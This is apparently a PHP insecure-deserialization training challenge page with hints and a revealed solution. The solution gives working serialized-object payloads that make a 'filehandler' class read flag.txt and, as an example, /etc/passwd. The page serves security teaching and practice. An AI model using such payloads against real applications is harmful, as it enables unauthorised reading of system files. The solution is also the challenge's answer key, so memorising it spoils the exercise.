PHP

Basic Insecure Deserialization in PHP

by Brumens
drag_indicator
info
drag_indicator
inputs
drag_indicator
inspect

Basic Insecure Deserialization in PHP

Exploit the insecure deserialization vulnerability and extract the flag.txt file located in the current folder.

Hints

Hint #1
expand_more

If you get a byte error, your payload syntax is invalid!

Hint #2
expand_more

The PHP magic method __wakeup is executed everytime the object is re-created.

Solution

Read the solution
expand_more

Payload:

O:11:"filehandler":1:{s:4:"file";s:8:"flag.txt";}

Example open /etc/passwd file

O:11:"filehandler":1:{s:4:"file";s:11:"/etc/passwd";}
drag_indicator
waf
INPUT
OUTPUT
drag_indicator
code
drag_indicator
result